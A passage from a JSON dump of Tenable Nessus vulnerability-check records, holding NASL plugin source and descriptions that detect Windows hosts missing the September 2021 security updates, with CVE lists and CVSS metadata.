attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005615: Windows 7 and Windows Server 2008 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36969", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005633.NASL", "href": "https://www.tenable.com/plugins/nessus/153379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153379);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36968\",\n \"CVE-2021-36969\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005615\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005615\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005615: Windows 7 and Windows Server 2008 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005615\nor cumulative update 5005633. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36968, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-38629, CVE-2021-38635,\n CVE-2021-38636)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005615-security-only-update-78aa3b33-a4d9-49ad-bb28-1394943a3d7b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?deeac612\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005633-monthly-rollup-cc6f560a-86da-4540-8bb1-df118fa45eb8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1c2d7a2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005615 or Cumulative Update KB5005633.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005615', '5005633');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005615, 5005633])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005627 or cumulative update 5005613. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005613.NASL", "href": "https://www.tenable.com/plugins/nessus/153375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153375);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005627\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005627\");\n\n script_name(english:\"KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005627\nor cumulative update 5005613. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005627-security-only-update-3404d598-7d6e-4007-93e8-49438460791f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c74eba5d\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005613-monthly-rollup-47b217aa-8d33-4b29-b444-77fcbe57410b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f099b11d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005627 or Cumulative Update KB5005613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005627', '5005613');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005627, 5005613])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005607 or cumulative update 5005623. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005607: Windows Server 2012 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005623.NASL", "href": "https://www.tenable.com/plugins/nessus/153384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153384);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005607\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005607\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n\n script_name(english:\"KB5005607: Windows Server 2012 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005607\nor cumulative update 5005623. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38633,\n CVE-2021-38638, CVE-2021-38639, CVE-2021-38667,\n CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005607-security-only-update-f2cb16bb-7282-4f2e-a43e-50c4163c877c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e96fa374\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005623-monthly-rollup-bcdb6598-517e-4d53-aa7c-dd7fcfdca204\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?adb97de7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005607 or Cumulative Update KB5005623.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005607', '5005623');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005607, 5005623])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:18", "description": "The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005568.NASL", "href": "https://www.tenable.com/plugins/nessus/153373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153373);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n 